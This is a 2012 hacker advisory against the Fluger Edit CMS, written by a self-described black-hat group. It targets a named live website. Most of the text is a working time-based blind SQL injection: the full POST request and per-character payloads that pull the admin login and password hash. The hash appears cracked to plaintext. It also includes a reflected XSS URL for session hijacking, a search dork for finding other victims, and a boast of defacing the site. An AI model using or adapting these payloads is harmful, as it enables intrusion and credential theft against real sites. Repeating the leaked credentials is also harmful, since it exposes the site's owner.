=====================================================
Vulnerable Software: Fluger Edit v.2 || administration software
Vendor: http://www.fluger.com/
Software License: Commercial
Vulnerabilities: Blind SQL Injection and XSS
Tested: In the wild
=====================================================
Dork: Designed and developed by Fluger IT All right reserved © | 2004 - 2012

************** FOR OUR BRO RAMIL SEFEROV! ************************
@OPERATION BY AZERBAIJAN BLACK HATZ: *WIPEN'EM purgens!*
I'M => AkaStep <= RESPONSIBLE FOR EVERYTHING IN THIS advisory
********************** REALLY! ********************************************
****************** ENJOY MAXIMALLY **************************************
======================================================

Fully disclosed, real exploitation examples:

GPC MUST BE OFF (magic_quotes_gpc: the payloads need a raw single quote to reach the query).

There is a time-based blind SQL injection on the login page:
http://www.artclima.am/edit/ <=== (admin panel)

The vulnerable handler is here:
http://www.artclima.am/edit/config_secure/verify.php
(Sorry, I have no access to the source code.)

The CMS looks like this:
http://s61.radikal.ru/i172/1209/29/bb88e6891edf.png

Because of the authentication mechanism you cannot bypass the login form by sending:
'or''='
Instead, use the time-based way to pull login:password out of the admin table.

Here we go. Print screens:
http://s010.radikal.ru/i314/1209/32/9dae8ab77a3d.png

http://www.artclima.am/edit/index.php?error

Headers:
Host: www.artclima.am
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Cookie: PHPSESSID=:$
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

POST DATA:
username=' or (select if(substr(password,1,33)='e044650a567ed2b2d04303e3793dfd95',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

*REPLY* The login has a blind SQLi. Bypass does not work. Time based rules!
www.artclima.am/edit/index.php?error

columns: user, password
table: admin

=========================================
There is 1 user: //TRUE
username=' or (select if(count(*)='1',sleep(30),0) from admin)-- and 5='5&password=sikdir

Let's pull the login:
login: admin //TRUE
username=' or (select if(user='admin',sleep(30),0) from admin)-- and 5='5&password=sikdir

Let's pull the password:
=========================================
1st character: e
username=' or (select if(substr(password,1,1)='e',sleep(30),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
2nd character: 0
username=' or (select if(substr(password,2,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
3rd character: 4
username=' or (select if(substr(password,3,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
4th character: 4
username=' or (select if(substr(password,4,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
5th character: 6
username=' or (select if(substr(password,5,1)='6',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
6th character: 5
username=' or (select if(substr(password,6,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
7th character: 0
username=' or (select if(substr(password,7,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
8th character: a
username=' or (select if(substr(password,8,1)='a',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
9th character: 5
username=' or (select if(substr(password,9,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
10th character: 6
username=' or (select if(substr(password,10,1)='6',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
11th character: 7
username=' or (select if(substr(password,11,1)='7',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
12th character: e
username=' or (select if(substr(password,12,1)='e',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
13th character: d
username=' or (select if(substr(password,13,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
(check afterwards)
=========================================
14th character: 2
username=' or (select if(substr(password,14,1)='2',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
15th character: b
username=' or (select if(substr(password,15,1)='b',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
16th character: 2
username=' or (select if(substr(password,16,1)='2',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
17th character: d
username=' or (select if(substr(password,17,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
18th character: 0
username=' or (select if(substr(password,18,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
19th character: 4
username=' or (select if(substr(password,19,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
20th character: 3
username=' or (select if(substr(password,20,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
21st character: 0
username=' or (select if(substr(password,21,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
22nd character: 3
username=' or (select if(substr(password,22,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
23rd character: e
username=' or (select if(substr(password,23,1)='e',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
24th character: 3
username=' or (select if(substr(password,24,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
25th character: 7
username=' or (select if(substr(password,25,1)='7',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
26th character: 9
username=' or (select if(substr(password,26,1)='9',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
27th character: 3
username=' or (select if(substr(password,27,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
28th character: d
username=' or (select if(substr(password,28,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
29th character: f
username=' or (select if(substr(password,29,1)='f',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
30th character: d
username=' or (select if(substr(password,30,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
31st character: 9
username=' or (select if(substr(password,31,1)='9',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
32nd character: 5
username=' or (select if(substr(password,32,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================

Verification: + //TRUE
username=' or (select if(substr(password,1,33)='e044650a567ed2b2d04303e3793dfd95',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

MD5: e044650a567ed2b2d04303e3793dfd95
Resolves to: price777

Sure! I will "rm" it too, with great pleasure!
Rm'ed: http://zone-h.org/mirror/id/18295382

Second way: session hijack to gain access to the admin panel.

XSS (reflected, in the type_name parameter of admin.php):
http://www.artclima.am/edit/admin.php?page=news_admin/news&type=25&type_name=Title%20Ptoduct%3Cscript%3Ealert%28%22OwnEd%20By%20AkaStep%22%29;%3C/script%3E&type_admin=Catalog&empty_sess=1

Print screen:
http://s61.radikal.ru/i173/1209/26/8f9f482ff32d.png

From the source code of the page (the type_name value is reflected unencoded):
Title Ptoduct<script>alert("OwnEd By AkaStep");</script>
==========================THE END=========================

SHOUTZ AND GREAT THANKS TO ALL MY FRIENDS:
===========================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
to all AA Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3.*
===========================================================
/AkaStep 02.09.2012